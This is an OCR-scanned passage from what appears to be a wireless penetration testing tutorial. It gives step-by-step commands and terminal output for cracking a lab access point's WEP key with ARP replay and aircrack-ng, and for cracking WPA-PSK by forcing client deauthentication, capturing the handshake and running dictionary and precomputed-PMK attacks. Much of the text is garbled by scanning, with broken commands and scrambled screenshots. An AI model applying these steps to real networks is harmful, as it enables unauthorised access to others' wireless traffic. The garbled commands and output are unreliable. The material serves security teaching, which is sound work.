personal mformaton 


WIRELESS NETWORK SETTINGS 
inate Auto Channel Scan 


so fiat the rouler can 
srárect the hest nosshie 
channel for your wireless 
nelwork lo operate on. 





Enable Wireless : |Y] Amys ~ | Addhew 
Wireless Network Name: Wireless Lab (Also called the SSID) 
- Etin Hidden Mode w 
802.11 Mode: Med 802.11n, 502. 11g and 802. 11h. + another way tn secure 
1 your network, Wu thes 
Enable Auto Channel Scan : coton enabled. no wireless 


Wireless Channel; 2.452 6Hz C811 + Gents wil be able to see 
your wirriras network 
Transmssion Rate: Best (sulometx) + (Mbt/s) when they scan to see 
whats avedalse, For your 
Channel Width : 2omr - wer riea deviens tm connect 
to your rout IE 
1 1 + 5 n ` . REL PR you 

Visibility Status : Vrdk Invii vai pdt iN uala i 
Wireless Network Name on 
each device 








WIRELESS SECURITY MODE 


If you have enabled 
Wireless Security, make 
To protect your privacy you can configure wareless security features. Ths device supparts three "sure you write doen the 
wreless securty modes, ncudng WEP, WPA-Personal, and WPA-Enterpnse. WEP is the ongmal Key ox Pessphrase that 
wreless encryption standard. WPA provides a higher level of security. WPA-Personal does not you have configured, You 
require an authentication server. The WPRA-Enterpree option requires an external RADIUS server. wi need tn enter ts 
information on any wireless 


device thal you connect to 
Security Mode: Nene - your waretest network 





WIRELESS 





IKK 
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2. On my access point, this can be done by setting the Security Mode to WEP. We will 
also need to set the WEP key length. 


WIRELESS NETWORK SETTINGS 

Enable Auto Channel Scan 
so that the router can 
select the best possible 
channel for your wireless 
network to operate on. 


Enable Wireless : || 








Wireless Lab (Also called the SSID) 
Enabling Hidden Mode is 


Mixed 802. lin, 802. lig and 802. iib w another way to secure 
F] your network. With this 
option enabled, no wireless 
dients will be able to see 
your wireless network 
when they scan to see 
what's available. For your 
wireless devices to connect 
to your router, you will 
need to manually enter the 
Wireless Network Name on 
each device. 


Wireless Network Name : 
802.11 Mode: 

Enable Auto Channel Scan : 
Wireless Channel : 
Transmission Rate : 
Channel Width : 

Visibility Status : 





2.462 GHz -CH 11 w 
Best (automatic) ~ (Mbit/s) 
20 MHz Y 


Q9 visible © Invisible 


WIRELESS SECURITY MODE d 


Wireless Security, make 


To protect your privacy you can configure wireless security features. This device supports three 
wireless security modes, including WEP, WPA-Personal, and WPA-Enterprise. WEP is the original 
wireless encryption standard. WPA provides a higher level of security. WPA-Personal does not 


require an authentication server. The WPA-Enterprise option requires an external RADIUS server. 


WEP is the wireless encryption standard. To use it you must enter the same key(s) into the 
router and the wireless stations. For 64 bit keys you must enter 10 hex digits into each key box. 
For 128 bit keys you must enter 26 hex digits into each key box. A hex digit is either a number 
from 0 to 9 or a letter from A to F. For the most secure use of WEP set the authentication type 
to "Shared Key" when WEP is enabled. 


You may also enter any text string into a WEP key box, in which case it will be converted into a 
hexadecimal key using the ASCII values of the characters. A maximum of 5 text characters can 
be entered for 64 bit keys, and a maximum of 13 characters for 128 bit keys. 


If you choose the WEP security option this device will ONLY operate in Legacy Wireless mode 
(802.11B/G). This means you will NOT get 11N performance due to the fact that WEP is not 
supported by Draft 11N specification. 


WEP Key Length : 
WEP Key 1: 

WEP Key 2: 

WEP Key 3: 

WEP Key 4: 
Default WEP Key : 
Authentication : 


128 bit (26 hex digits) w (length applies to all keys) 
0990909090009009090909009099 
0990909090909090909090909099 
99990909090090009090909099 
099090909000900909090909099 

WEP Key 1 v 

Shared Key w 


sure you write down the 
Key or Passphrase that 
you have configured. You 
will need to enter this 
information on any wireless 
device that you connect to 
your wireless network. 


WIRELESS 





3. Once the settings are applied, the access point should now be offering WEP as the 
encryption mechanism of choice. Let us now set up the attacker machine. 


WLAN Encryption Flaws 


4. Let us bring up WI an0 by issuing the commandi f config wlan0 up. Then we 
willrunairmon-ng start wlan0 to create mon0, the monitor mode interface, as 
shown in the following screenshot. Verify the mon0 interface has been created using 
| wconfig command: 


e re root@bt: ~ - Shell - Konsole 


Session Edit View Bookmarks Settings Help 


root@bt :~# 
root@bt :~# 
rooteot:-# airmon-ng start wlanO 





Chipset Driver 


RTL8187 rt18187 - [phy0] 
(monitor mode enabled on mond) 


rootüabt :~# 
root@bt:~# iwconfig 
no wireless extensions. 


no wireless extensions. 
no wireless extensions. 


IEEE 802.11bg ESSID:"" 

Mode:Managed Frequency:2.412 GHz Access Point: Not-Associated 
Tx-Power=27 dBm 

Retry min limit:7 RTS thr:off Fragment thr:off 

Encryption key:off 

Power Management: off 

Link Quality:0 Signal level:0 Noise level:0 

Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 

Tx excessive retries:0 Invalid misc:0 Missed beacon:0 


IEEE 802.11bg Mode:Monitor Frequency:2.412 GHz Tx-Power=27 dBm 
Retry min limit:7 RTS thr:off Fragment thr:off 

Encryption key:off 

Power Management: off 

Link Quality:0 Signal level:0 Noise level:0 





|| WE root@bt: ~ - Shell - Ko: 





5. Let's runai rodump- ng to locate our lab access point using the command 
al rodump-ng mond. As you can see in the following screenshot, we are able to see 
the Wi rel ess Lab access point running WEP: 
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root@bt: ~ - Shell - Konsole 


Session Edit View Bookmarks Settings Help 


CH 1 ][ Elapsed: 4 s ][ 2011-02-06 03:21 
PWR Beacons #Data, #/s CIPHER AUTH ESSID 


-14 : WEP Wireless Lab 
-40 «length: 0» 
-40 «length: 0» 
-34 TKIP  PSK Vivek 

-43 «length: 0» 
-66 A TKIP PSK shrooti 

-66 1 TKIP PSK Sunny 


STATION Rate Lost Packets Probes 


00:25:5E:17:41: 00:22:FB:35:FC:44 24 - 5 0 
root@bt:~# J 





6. For this exercise, we are only interested in the Wi rel ess Lab, so let us enter 


airodump-ng-bssid 00:21:91: D2:8E:25 --channel 11--write 
WEPCracki ngDemo mon0 to only see packets for this network. Additionally, 


we will requestai rodump- ng to save the packets into apcap file using the 
- write directive: 






root@bt: ~ - Shell - Konsole <2> 


Session Edit View Bookmarks Settings Help 


root@bt:-# airodump-ng --bssid 00:21:91:D2:8E:25 --channel 11 --write WEPCrackingDemo monO 
root@bt :~# 
root@bt:~# §j 





root@bt: ~ - Shell - Konsole <2> 


Session Edit View Bookmarks Settings Help 





CH 11 ][ Elapsed: 0 s ][ 2011-02-06 03:31 


BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 
00:21:91:D2:8bE:25 -19 83 27 0 0 11 54. WEP WEP Wireless Lab 


BSSID STATION PWR Rate Lost Packets Probes 
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7. Now let us connect our wireless client to the access point and use the WEP key as 
abcdefabcdefabcdefabcdef 12. Once the client has successfully connected, 
ai rodump- ng should report it on the screen: 


root@bt: ~ - Shell - Konsole <2> 


Session Edit View Bookmarks Settings Help 





CH 11 ][ Elapsed: 8 mins ][ 2011-02-06 03:38 ][ 140 bytes keystream: 00:21:91:D2:8E:25 
BSSID PWR RXQ Beacons #Data, £/s CH MB ENC CIPHER AUTH ESSID 
00:21:91:D2:8bE:25 -18 100 4399 61 0 11 54e. WEP WEP SKA Wireless Lab 
BSSID STATION PWR Rate Lost Packets Probes 


00:21:91:D2:8E:25 60:FB:42:D5:E4:01 -9 0 -54e 0 41 Wireless Lab 





8. If youdoan|s in the same directory, you will be able to see files prefixed with 
WEPCracki ngDemo- * as shown in the following screenshot. These are traffic-dump 
files created by al rodump- ng: 


root@bt: ~ - Shell - Konsole 


roota@bt:~# ls 
WEPCrackingDemo-01-00-21-91-D2-8E-25.xor WEPCrackingDemo-01.kismet.csv install.sh 
WEPCrackingDemo-01.cap WEPCrackingDemo-01.kismet.netxml 
WEPCrackingDemo-01.csv cdrom 

root(bt :~# 

root(bt :~# 

roote@bt:~# B 


Session Edit View Bookmarks Settings Help 





9. Ifyou notice the ai r odump- ng screen, the number of data packets listed under the 
#Data column is very few in number (only 68). 


‘number of data packets, encrypted with the same key to exploit weaknesses in the 


protocol. 





root@bt: ~ - Shell - Konsole <2> 
Session Edit View Bookmarks Settings Help 





CH 11 ][ Elapsed: 13 mins ][ 2011-02-06 03:44 ][ 140 bytes keystream: 00:21:91:D2:8E:25 


BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 
00:21:91:D2:8E:25 -7 84 7562 68 © 11 54e. WEP WEP SKA Wireless Lab 
BSSID STATION PWR Rate Lost Packets Probes 


00:21:91:D2:8E:25 60:FB:42:D5:E4:01 -14 B - le 0 45 Wireless Lab 
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10. We will capture ARP packets on the wireless network using ai repl ay- ng and 
inject them back into the network, to simulate ARP responses. We will be starting 
al repl ay-ng in a separate window, as shown in the next screenshot. Replaying 
these packets a few thousand times, we will generate a lot of data traffic on the 
network. Even though ai rep! ay- ng does not know the WEP key, it is able to 
identify the ARP packets by looking at the size of the packets. ARP is a fixed header 

protocol and thus the size of the ARP packet can be easily determined and can be 

used for identifying them even within encrypted traffic. We will run ai repl ay- 

ng with the options that are discussed next. The - 3 option is for ARP replay, - b 

specifies the BSSID of our network, and - h specifies the client MAC address that we 

are spoofing. We need to do this, as replay attack will only work for authenticated 
and associated client MAC addresses. 





root@bt: ~ - Shell - Konsole 


Session Edit View Bookmarks Settings Help 





root@bt:~-# aireplay-ng -3 -b 00:21:91:D2:8e:25 -h 60:fb:42:d5:e4:01 monofl 





11. Very soon you should see that ai replay- ng was able to sniff ARP packets and has 
started replaying them into the network: 


root@bt: ~ - Shell - Konsole 
Session Edit View Bookmarks Settings Help 


root@bt:-# aireplay-ng -3 -b 00:21:91:D2:8e:25 -h 60:fb:42:d5:e4:01 mond 
The interface MAC (00:C0:CA:3E:BD:93) doesn't match the specified MAC (-h). 
ifconfig monO hw ether 60:FB:42:D5:E4:01 
03:59:25 Waiting for beacon frame (BSSID: 00:21:91:D2:8E:25) on channel 11 
Saving ARP requests in replay arp-0206-035925.cap 
You should also start airodump-ng to capture replies. 
[lead 6043 packets (got 1886 ARP requests and 1869 ACKs), sent 1963 packets...(500 pps) 

















12. At this point, ai rodump- ng will also start registering a lot of data packets. All 
these sniffed packets are being stored in the WEP Cracki ngDemo- * files that we 
saw previously: 


root@bt: ~ - Shell - Konsole <2> 
Session Edit View Bookmarks Settings Help 





CH 11 ][ Elapsed: 30 mins ][ 2011-02-06 04:01 ][ 140 bytes keystream: 00:21:91:D2:8E:25 


BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 


00:21:91:D2:8E:25 -6 100 16387 11190 0 11 54e. WEP WEP SKA Wireless Lab 


BSSID STATION PWR Rate Lost Packets Probes 


00:21:91:D2:8E:25 60:FB:42:D5:E4:01 0 0 22026 Wireless Lab 
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13. Now, let us start with the actual cracking part! We fire up ai rcrack-ng with 
the options WEPCRacki ngDemo- 01. cap in a new window. This will start the 


aircrack- ng software and it will begin working on cracking the WEP key using the 
data packets in the file. Note that it is a good idea to haveai rodump- ng —collecting 
the WEP packets, ai replay- ng—doing the replay attack, and Ai rcrack- ng — 
attempting to crack the WEP key based on the captured packets, 








root@bt: ~ - Shell - Konsole <3> 


Session Edit View Bookmarks Settings Help 





}root@bt:-# aircrack-ng WEPCrackingDemo-01.cap 
[Opening WEPCrackingDemo-01.cap 
Read 189695 packets. 
# BSSID ESSID Encryption 
1 00:21:91:D2:8E:25 Wireless Lab WEP (11196 IVs) 


Choosing first network as target. 


[Opening WEPCrackingDemo-01.cap 
Reading packets, please wait... 





14. Your screen should look like the following screenshot, when aircrack- ng is 
working on the packets to crack the WEP key: 


root@bt: ~ - Shell - Konsole <3> 


Session Edit View Bookmarks Settings Help 





Aircrack-ng 1.0 r1645 


[00:00:04] Tested 331777 keys (got 11111 IVs) 


byte(vote) 

AB(17664) 1D(16640) 5A(15360) BA(15360) D1(15104) 07(14848) E8(14848) F0(14848) 
DD(17664) 78(16384) B0(16384) 25(15104) 48(14848) 36(14592) 79(14336) 0F(14080) 
92(15872) 84(15616) 1A(15360) 38(15104) 14(14848) 29(14848) A1(14592) C1(14592) 
7C(16896) FF(16384) 7A(16128) 12(15360) 47(15360) B7(15360) 85(15104) 94(15104) 
0B(15872) CB(15616) 0F(15104) B1(15104) A9(14848) C4(14848) 2A(14592) 36(14592) 
46(14848) 47(14592) 5C(14592) 9A(14336) 30(14080) 46(14080) 4C(14080) 6A(14080) 
2B(15104) 44(14592) A4(14592) EC(14592) 24(14080) 2B(14080) 3B(14080) 6D(14080) 
56(15872) 0C(14848) 21(14848) 5C(14848) D8(14848) F9(14848) 2C(14336) 40(14336) 
02(14848) D4(14592) E4(14592) 11(14336) 13(14336) 70(14336) BC(14336) 46(14080) 
B3(16384) 5E(15872) D4(15872) 4C(15104) EB(14848) 6F(14592) BC(14592) E0(14592) 
5B(15616) 03(14592) 24(14592) 5F(14592) 68(14592) E0(14592) 5E(14336) 95(14336) 
C8(15616) A6(15360) 39(15104) D7(14848) 95(14592) BD(14592) 46(14336) 0B(14080) 
6B(15104) 15(14848) 57(14848) 70(14592) CE(14592) 0A(14336) 6F(14336) CA(14336) 


B 
0 
1 
2 
3 
4 
9 
6 
7 
8 
9 


O» UJ hJ GJ 4» hJ 4» UJ 4» hNJ UJ PS DN 
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15. The number of data packets required to crack the key is non-deterministic, but 
generally in the order of a hundred thousand or more. On a fast network (or using 
al replay- ng), this should take 5-10 minutes at most. If the number of data 
packets currently in the file are not sufficient, then ai rcrack- ng will pause as 
shown in the following screenshot and wait for more packets to be captured, and 
will then restart the cracking process again: 


" root@bt: ~ - Shell - Konsole <3> 


Session Edit View Bookmarks Settings Help 


Aircrack-ng 1.0 r1645 





[00:01:49] Tested 144029 keys (got 11199 IVs) 


depth 
9/ 10 
9/ 14 
18/ 2 
17/ 18 
25/ 4 


byte(vote) 
CA(14592) 
FA(14336) 
D4(13824) 
FE(14080) 
FC (13824) 


15(14080) 
5A(14080) 
26 (13568) 
60 (13824) 
60 (13568) 


32(14080) 7D(14080) 6C(13824) 
61(14080) 6B(14080) BC(14080) 
5F(13568) A5(13568) FE(13568) 
8C(13824) DD(13824) F6(13824) 
68(13568) 1E(13312) 5D(13312) 


90(13824) 
C1(14080) 
19(13312) 
10(13568) 
62(13312) 


E5(13824) 3D(13568) 
C7(14080) F1(14080) 
1D(13312) 22(13312) 
39(13568) A6(13568) 
80(13312) 9E(13312) 


. Next try with 15000 IVs. 


root@bt: ~ - Shell - Konsole <3> 


Session Edit View Bookmarks Settings Help 





Qa 
(D 
"o 
rt 
=> 


WOON O» Ui 4» LJ hJ P2 OW 


I HHIMIEPBÀoOOoOoTOOOGOCO 
~SNN NNN NNN 
NJ HEB EP NEE H3 UI H3 ES E ee 


KEY FOUND! 


byte(vote) 


AB(75520) 
CD (72704) 
EF (69888) 
AB (64512) 
CD (65024) 
51(58112) 
AB (67584) 
CD (65024) 
EF (67072) 
AB (59904) 
2C (58112) 
A8 (57856) 
12 (57308) 


Aircrack-ng 1.0 r1645 


[00:25:36] Tested 1285089 keys (got 48988 IVs) 


4D (56576) 
6C (60160) 
ED (58368) 
47 (60416) 
7D(59904) 
6D (57856) 
A4(58624) 
8B(58112) 
F7 (58880) 
86 (57856) 
E0 (57600) 
48 (57600) 
CE(55844) 


Decrypted correctly: 100% 


root@bt :~# 


90 (56320) 
7A(59904) 
EE(57600) 
B9(60416) 
43(58624) 
72(57344) 
6D(58112) 
40(57856) 
66(58624) 
41(57344) 
FB(57344) 
9F(57600) 
A4(55076) 


[ AB:CD:EF:AB:CD:EF:AB: 


3A(56064) 
A0(57088) 
AF (57344) 
5E(59392) 
F9(58112) 
CE(57088) 
FB(57856) 
D5(57856) 
A8(57856) 
94(57344) 
47 (56576) 
34(56832) 
1B(54892) 


2B(55552) 
D6(56832) 
9A(56832) 
A1(57856) 
03(57088) 
44(56320) 
16(57344) 
81(57344) 
5D(57344) 
0A(56576) 
9D (56576) 
AF (56320) 
68(54784) 


CD:EF:AB:CD:EF:12 ] 


KcK 


B7 (55552) 
BC (56576) 
51(56320) 
82 (57600) 
EE(56576) 
5C(55808) 
A2(57088) 
D6(57344) 
A0(57344) 
08(56320) 
C4(56576) 
D7(56320) 
C0(54784) 


BA(55552) 
C5(56576) 
A3(56320) 
E1(57088) 
41(56320) 
9E(55552) 
24(56832) 
DA(57088) 
11(57088) 
25(56064) 
17(55552) 
8D(56064) 
66(54748) 


CB(55552) 
1E(56320) 
C5(56320) 
E7(56576) 
28(55552) 
05(55040) 
91(56832) 
8E(55808) 
CC(56832) 
A9 (56064) 
21(55552) 
22(55808) 
4F(54564) 
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17. 









X OAV 
We set up WEP in our lab and successfully cracked the WEP key. In order to do this, we 

first waited for a legitimate client of the network to connect to the access point. After this, 
we used the ai repl ay- ng tool to replay ARP packets into the network. This caused the 
network to send ARP replay packets, thus greatly increasing the number of data packets sent 
over the air. We then used ai rcrack- ng to crack the WEP key by analyzing cryptographic 
weaknesses in these data packets. 





Note that, we can also fake an authentication to the access point using the Shared Key 
Authentication bypass technique, we learnt in the last chapter. This can come in handy, if 
the legitimate client leaves the network. This will ensure we can spoof an authentication and 
association and continue to send our replayed packets into the network. 





Have a go hero — fake authentication with WEP cracking 


In the previous exercise, if the legitimate client had suddenly logged off the network, we 
would not be able to replay the packets as the access point will not accept packets from un- 
associated clients. 


Your challenge would be to fake an authentication and association using the Shared Key 
Authentication bypass we learnt in the last chapter, while WEP cracking is going on. Log off 
the legitimate client from the network and verify if you are still able to inject packets into the 
network and if the access point accepts and responds to them. 


K LEEK Leet 





Both WPA and WPA2 allow for either EAP-based authentication, using Radius servers 
(Enterprise) or a Pre-Shared Key (PSK) (Personal)-based authentication schema. 


dec 
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‘common passphrases. Then, using tools like Ai rcrack- ng, we can try to crack the WPA/ 


WPA2 PSK passphrase. 


An illustration of the four-way handshake is shown in the following screenshot: 


Supplicant 
PP AJ Authenticator 
-w Probe Request-Response 


Fadel leashed 
Authentication RR, Association RR 


Pre-Shared Key 256 bit 


Snounce 


Key Installed 


Key Install Acknowledgement 





The way WPA/WPA2 PSK works is that, it derives the per-sessions key called Pairwise 
Transient Key (PTK), using the Pre-Shared Key and five other parameters—SSID of Network, 
Authenticator Nounce (ANounce), Supplicant Nounce (SNounce), Authenticator MAC 
address (Access Point MAC), and Suppliant MAC address (Wi-Fi Client MAC). This key is 
then used to encrypt all data between the access point and client. 


An attacker who is eavesdropping on this entire conversation, by sniffing the air can get all 
the five parameters mentioned in the previous paragraph. 
So how is the Pre-Shared Key created? 





AXE 
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In a typical WPA/WPA2 PSK dictionary attack, the attacker would use a large dictionary of 

possible passphrases with the attack tool. The tool would derive the 256-bit Pre-Shared Key 
from each of the passphrases and use it with the other parameters, described aforesaid to 
create the PTK. The PTK will be used to verify the Message Integrity Check (MIC) in one of 
the handshake packets. If it matches, then the guessed passphrase from the dictionary was 
correct, otherwise it was incorrect. Eventually, 


the dictionary, it will be identified. This is exactly how WPA/WPA2 PSK cracking works! The 


following figure illustrates the steps involved: 






4 Way Handshake 


SNonce 
ANonce 


Pre-Shared Key 256 bit , AP MAC 


Client MAC 


Verify by Checking the MIC 


In the next exercise, we will look at how to crack a WPA PSK wireless network. The exact 
same steps will be involved in cracking a WPA2-PSK network using CCMP(AES) as well. 


| - 
Lib 
v 
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Time for action — cracking WPA-PSK weak passphrase 


Follow the given instructions to get started: 


1. Let us first connect to our access point Wireless Lab and set the access point to use 
WPA-PSK. We will set the WPA-PSK passphrase to abcdefgh, so that it is vulnerable 
to a dictionary attack: 


wireless devices to connect 
WIRELESS NETWORK SETTINGS to your router, you will 

need to manually enter the 

Wireless Network Name on 


Enable Wireless : |j Always v each device. 
Wireless Network Name : Wireless Lab (Also called the SSID) If you have enabled 


Wireless Security, make 
802.11 Mode: Mixed 802.11n, 802.11g and 802.11b ~» sure you write down the 
Key or Passphrase that 
Enable Auto Channel Scan : you have configured. You 
will need to enter this 
Wireless Channel: 2.462GHz-CH11 w information on any wireless 
device that you connect to 
your wireless network. 


























Transmission Rate : Best (automatic) ~ (Mbit/s) 
Channel Width : 20 MHz - 
Visibility Status: © Visible © Invisible 


WIRELESS SECURITY MODE 


To protect your privacy you can configure wireless security features. This device supports three 
wireless security modes, including WEP, WPA-Personal, and WPA-Enterprise. WEP is the original 
wireless encryption standard. WPA provides a higher level of security. WPA-Personal does not 
require an authentication server. The WPA-Enterprise option requires an external RADIUS server. 


Security Mode: WPA-Personal w 


Use WPA or WPA2 mode to achieve a balance of strong security and best compatibility. This 
mode uses WPA for legacy clients while maintaining higher security with stations that are WPA2 
capable. Also the strongest cipher that the client supports will be used. For best security, use 
WPA2 Only mode. This mode uses AES(CCMP) cipher and legacy stations are not allowed access 
with WPA security. For maximum compatibility, use WPA Only. This mode uses TKIP cipher. 
Some gaming and legacy devices work only in this mode. 


To achieve better wireless performance use WPA2 Only security mode (or in other words AES 
cipher). 


WPA Mode: WPA Only 
Cipher Type: TKIP - 
Group Key Update Interval: 3600 (seconds) 
PRE-SHARED KEY 


Enter an 8- to 63-character alphanumeric pass-phrase. For good security it should be of ample 
length and should not be a commonly known phrase. 


Pre-Shared Key: sseeeccs 


WIRELESS 
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2. Westartairodump- ng with the command ai rodump- ng -bssi d. 
00:21:91: 2:8E:25 -channel 11-write WPACrackingDemo mon0,so that it 


starts capturing and storing all packets for our network: 





root@bt: ~ - Shell - Konsole <2> 


Session Edit View Bookmarks Settings Help 





CH 11 ][ Elapsed: 0 s ][ 2011-02-06 03:31 
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 


BB:21:91:D2:8E:25 -19. B3 27 0 0 11 54. WEP WEP Wireless Lab 


STATION Rate Lost Packets Probes 


E root@bt: ~ - Shell - 
Session Edit View Bookmarks Settings Help 
rooteot:-# aireplay-ng --deauth 1 -a 00:21:91:D2:8e:25 mond 
07:29:09 Waiting for beacon frame (BSSID: 00:21:91:D2:8E:25) on channel 11 
NB: this attack is more effective when targeting 


a connected wireless client (-c <client's mac>). 
07:29:09 Sending DeAuth to broadcast -- BSSID: [00:21:91:D2:8E:25] 


root@bt :~# a 





"m root@bt: ~ - Shell - Konsole <3> 


Session Edit View Bookmarks Settings Help 


CH 11 ][ Elapsed: 11 mins ][ 2011-02-06 07:17 ][ WPA handshake: 00:21:91:D2:8E:25 





BSSID PWR RXQ Beacons #Data, #/s CH MB  ENC CIPHER AUTH ESSID 
00:21:91:D2:8E:25 -22 96 6116 1709 1 11 54e. WPA TKIP PSK Wireless Lab 
BSSID STATION PWR Rate Lost Packets Probes 


00:21:91:D2:8E:25 60:FB:42:D5:E4:01 -9 0 -54e 8 40 Wireless Lab 
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5. We can stop ai rodump-ng now. Let's open up the cap file in Wireshark and view 
the four-way handshake. Your Wireshark terminal should look like the following 


screenshot. | have selected the first packet of the four-way handshake in the 
trace file, in the following screenshot. The handshake packets are the ones whose 
protocol is EAPOL Key: 





dex-Ol.cap - Wireshark 


Ale Edi Yew Ge Capture Analyze Statistics Help 

NE DA eg E & & m 3o B 
Bi ais e a cix € » 3E S99 F a EI Xx 
[v] Bier: v | 4e Epression.. A, clear «f Apply 


me. [mm [soea eatin ‘otal | 


2035 10L M5550 IntelcCor 35:1c:44 D-Link d2:8e:25 IEEE BO2 Association Pequest, 54-1003, FH-0, Flàagsz,........, 55ID-"Wireless Lab" 
2842 181. 244 IntelCor_35:ferdd (RA IEEE B02 Acknowledgement, Flagsz........ 
2841 181,347 D-Link d2:Be:25 IntelCor 35:1c:4s IEEE BOZ Association Response, EM-2001, Peo, Flagsz........ 
2842 18l. 7 D.Link da:Berzs (FA) IEEE BO2 &cknawledgement, Flags= 
ITI TEENS - 
2844 181, 332 D.Link da:merzs [BRA] 
264s 181.3% Intelcor 3:fcrad D.Link da:Berzs EAPOL Key 
2806 181. 34372 D Link_d3:e:35 Intelcor 3&:fcras EAPOL Key 
2847 181. 23539 D-Link da:8s:25 [RA] IEEE 802 acknowledgement, Elags- 
27848 1Bl.355420 Inrelcor 35:06:44 D-Link d2:Berz5 EAPO Key 
2849 181. ayaa D-Link d2:Berza& [RA) IEEE BO? Acknmwledgement, Elagsz........ 
284) 181.: 20 Intelcar 35:16:44 D-Link d2:@e:25 IEEE BO? QoS Data, S2, Peed, Elagsz.p..H..T 
7851 181. 355496 Intelcar 35S:fertáá [RA IEEE Bü2 acknowledgement, 
ata? LAL. IntelCar ao:fciaa Broadcast IEEE Bü2 005 Data, Svea, FMeD, Flagss.p..... I 
b Frame 27843 [133 bytes on wire, 133 bytes captured) 
b IEEE 802.11 Qo5 Data, Flags: ......F. 
b Logical-Link Control 
= gü2.1X Authentication 
Version; i 
Typa: Key [3] 
Length: 35 
Descriptor Type: PAPOL wea key (354) 
Key Information: OxDOBO 
Key Length: 32 
Raplay Counter: 42 
Honce: ODZzB3z2oNIFFÜBDOSFBdDODDGAFDOSE360 x7 BdDEsDO7 718A. .. 
key IV ODOOOOOOOODOOOOOoOoOOOODOOOODOOOOOO 
WA Key HoL; ODODODOOOOUOOOOUNI 
We Key ID: OOOOOODOOOOODOOU 
WPA Key MIC: OOOOOO00DO0OODOOOOQODODO0OOOOODODQ) 
WPA Key Length: O 





6. Now we will start the actual key cracking exercise! For this, we need a dictionary 


of common words. BackTrack ships with a dictionary file dar c0de. | st located as 
shown in the following screenshot. It is important to note that in WPA cracking, 


BackTrack ships with some dictionaries, but 
these may be insufficient. Passwords that people choose depend on a lot of things. 
This includes things like, which country the users belong to, common names and 
phrases in that region, security awareness of the users, and a host of other things. It 
may be a good idea to aggregate country- and region-specific word lists, when going 
out for a penetration test: 





root@bt: ~ - Shell - Konsole <3> 
Session Edit View Bookmarks Settings Help 


root@ot:-# ls /pentest/passwords/wordlists/darkcOde. lst 
/pentest/passwords/wordlists/darkcOde.lst 





root(bt :~# 
root(bt :~# 
root(bt :~# 
root@bt:~# li 
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7. We will now invoke ai rcrack- ng with the pcap file as input and a link to the 


pum 
- (d) 


root@bt: ~ - Shell - Konsole <2> 


Session Edit View Bookmarks Settings Help 





root@bt:-# aircrack-ng WPACrackingDemo-01.cap -w /pentest/passwords/wordlists/darkcOde.lst Jj 





8. Aircrack-ng uses the dictionary file to try various combinations of passphrases 
and tries to crack the key. 
nd your screen will look similar to the one in the screenshot: 


— = 
- (0) 


root@bt: ~ - Shell - Konsole <2> 


Session Edit View Bookmarks Settings Help 


Aircrack-ng 1.0 r1645 





00] 176 keys tested (382.44 k/s) 


KEY FOUND! [ Glspee[zeu | 


Master Key A4 
9A 


Transient Key : 5C 
4C 
3A 
12 


EAPOL HMAC : CD 
rootebt:~# B 





9. Please note that, as this is a dictionary attack, the prerequisite is that the passphrase 
must be present in the dictionary file you are supplying toai rcrack- ng. If the 
passphrase is not present in the dictionary, the attack will fail! 


FXX K 
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We set up WPA-PSK on our access point with a common passphrase abcdefgh. We then 
used a de-authentication attack to have legitimate clients to reconnect to the access point. 
When we reconnect, we capture the four-way WPA handshake between the access point 
and the client. 





As WPA-PSK is vulnerable to a dictionary attack, we feed the capture file containing the 

WPA four-way handshake and a list of common passphrases (in the form of a wordlist) to 

Ai rcrack- ng. Asthe passphrase abcdefgh is present in the wordlist, Ai rcrack- ng is 

able to crack the WPA-PSK shared passphrase. It is very important to note again that in 

WPA dictionary-based cracking, you are just as good as the dictionary you have. Thus, it is 
important to compile together a large and elaborate dictionary before you begin. Though 
BackTrack ships with its own dictionary, it may be insufficient at times, and would need more 
words, especially based on the localization factor. 


Have a go hero - trying WPA-PSK cracking with Cowpatty 


Cowpatty isa tool, which can also crack a WPA-PSK passphrase using a dictionary attack. 
This tool is included with BackTrack. | leave it as an exercise for you to use Cowpatty to 
crack the WPA-PSK passphrase. 


Also, try setting an uncommon passphrase, not present in the dictionary, and try the attack 
again. You will now be unsuccessful in cracking the passphrase, with both Ai rcrack- ng 
and Cowpatty. 


It is important to note that, the same attack applies even to a WPA2 PSK network. | would 
encourage you to verify this independently. 


CREEK Ok LOR vestro eR: 


We have already seen in the previous section that if we have the correct passphrase in 
our dictionary, cracking WPA-Personal will work everytime like a charm. So why we don't 
just create a large elaborate dictionary of millions of common passwords and phrases 
people use? This would help us a lot and most of the time, we would end up cracking the 
passphrase. It all sounds great, but we are missing one key component here—time taken. 
One of the more CPU and time-consuming calculations is that of the Pre-Shared Key using 
the PSK passphrase and the SSID through the PBKDF2. This function hashes the combination 
of both over 4,096 times before outputting the 256 bit Pre-Shared Key. The next step of 
cracking involves using this key along with parameters in the four-way handshake and 
verifying against the MIC in the handshake. This step is computationally inexpensive. Also, 
the parameters will vary in the handshake everytime and hence, this step cannot be pre- 
computed. Thus to speed up the cracking process we need to make the calculation of the 
Pre-Shared Key from the passphrase as fast as possible. 


dX 
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Key (PMK) in the 802.11 standard parlance. It is important to note that, as the SSID is also 


used to calculate the PMK, with the same passphrase but a different SSID, we would end up 
with a different PMK. Thus, the PMK depends on both the passphrase and the SSID. 







In the next exercise, we will look at how to pre-calculate the PMK and use it for WPA/WPA2 
PSK cracking. 





Time for action — speeding up the cracking process 


1. We can pre-calculate the PMK for a given SSID and wordlist using the genpmk tool 
with the command genpmk -f / pentest/passwords/ wordlists/darkcOde. 
Ist -d PMK-Wireless-Lab-s "Wireless Lab" as shown in the following 
screenshot. This creates the file PMK- Wi rel ess- Lab that contains the pre- 
generated PMK: 


rootebt:-# genpmk -f /pentest/passwords/wordlists/darkcOde.lst -d PMK-Wireless-Lab -s "Wireless Lab" 
genpmk 1.1 - WPA-PSK precomputation attack. «jwright(Qhasborg.com» 
File PMK-Wireless-Lab does not exist, creating. 


key no. : 012ihO0n 
key no. : 070mi714n 
key no. : 0d0n746124 
key no. : 0pini0n47iv3n355 
key no. : 0v312121i07 
key no. : 0v312bu9 
key no. : 0vi6312m 
key no. : 1 ARSENIAN 
key no. : 1 BEVERLE 
key no. : 1 BUDROS 
key no. CIAGLO 
key no. DELLER 
key no. ELSBERND 
key no. FUMAGALLI 
key no. GROENSTEIN 
key no. HESSELGREN 
key no. JONATHON 
